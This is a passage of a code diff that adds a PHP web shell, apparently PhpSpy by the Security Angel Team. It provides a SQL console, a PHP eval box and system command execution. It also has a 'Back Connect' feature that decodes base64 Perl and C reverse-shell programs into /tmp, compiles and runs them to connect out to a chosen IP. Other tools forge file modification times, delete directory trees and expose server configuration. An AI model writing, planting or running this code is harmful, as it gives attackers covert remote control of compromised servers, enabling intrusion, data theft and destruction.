+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','sqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','sqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+					}
+					if ($doing == 'insert') {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;	
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+									$result = q($query);
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)</span></td>");
+									}
+									p('</tr>');
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									tbfoot();
+									p($multipage);
+									break;	
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','sqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'</td>');
+					p('<td>'.$table['Update_time'].'</td>');
+					if ($highver) {
+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('</tr>');
+				}
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end sql backup
+
+
+elseif ($action == 'backconnect') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($start && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc $yourip $yourport &");
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','backconnect');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end sql backup
+
+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>Instead &raquo;');
+	p('year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';	
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Copyright (C) 2004-2008 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+function m($msg) {
+	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $admin, $timestamp, $_SERVER;
+	$key = ($prefix ? $admin['cookiepre'] : '').$key;
+	$life = $life ? $life : $admin['cookielife'];
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
+}	
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// µÇ½Èë¿Ú
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="doing" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr); 
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+
+// Ò³Ãæµ÷ÊÔÐÅÏ¢
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//Á¬½ÓÊý¾Ý¿â
+function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+// È¥µôתÒå×Ö·û
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// Çå³ýHTML´úÂë
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// »ñȡȨÏÞ
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+// ɾ³ýĿ¼
+function deltree($deldir) {
+	$mydir=@dir($deldir);	
+	while($file=$mydir->read())	{ 		
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file); 
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	} 
+	$mydir->close(); 
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// ¼ì²éPHPÅäÖòÎÊý
+function getcfg($varname) {
